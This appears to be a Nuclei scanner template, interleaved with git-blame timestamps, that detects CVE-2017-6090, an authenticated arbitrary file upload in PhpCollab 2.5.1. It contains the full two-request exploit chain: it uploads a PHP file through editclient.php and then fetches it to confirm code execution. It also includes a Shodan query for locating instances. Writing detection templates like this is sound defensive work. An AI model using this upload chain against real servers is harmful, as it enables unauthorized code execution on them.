2021-07-27 09:51:01 +00:00
id : CVE-2017-6090
info :
2022-04-07 13:53:15 +00:00
name : PhpColl 2.5.1 Arbitrary File Upload
2021-07-27 09:51:01 +00:00
author : pikpikcu
2021-09-10 11:26:40 +00:00
severity : high
2022-04-22 10:38:41 +00:00
description : PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.
2022-04-07 13:53:15 +00:00
reference :
- https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/
- https://nvd.nist.gov/vuln/detail/CVE-2017-6090
2022-05-17 09:18:12 +00:00
- https://www.exploit-db.com/exploits/42934/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-6090
cwe-id : CWE-434
2022-07-10 09:37:56 +00:00
metadata :
shodan-query : http.title:"PhpCollab"
2022-08-27 04:41:18 +00:00
tags : cve2017,phpcollab,rce,fileupload,edb,cve
2021-07-27 09:51:01 +00:00
requests :
- raw :
- | # REQUEST 1
2021-07-27 12:10:51 +00:00
POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
2021-07-27 09:51:01 +00:00
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=---------------------------154934846911423734231554128137
-----------------------------154934846911423734231554128137
2021-07-27 12:20:49 +00:00
Content-Disposition : form-data; name="upload"; filename="{{randstr}}.php"
2021-07-27 09:51:01 +00:00
Content-Type : application/x-php
2021-07-27 12:20:49 +00:00
<?php echo md5('phpcollab_rce');?>
2021-07-27 09:51:01 +00:00
-----------------------------154934846911423734231554128137 --
- | # REQUEST 2
2021-07-27 12:26:56 +00:00
GET /logos_clients/1.php HTTP/1.1
2021-07-27 09:51:01 +00:00
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
part : body
2021-07-27 12:20:49 +00:00
words :
- "48dbd2384cb6b996fa1e2855c7f0567f"
2021-07-27 09:51:01 +00:00
- type : status
status :
- 200
2022-04-07 13:53:15 +00:00
# Enhanced by mp on 2022/04/06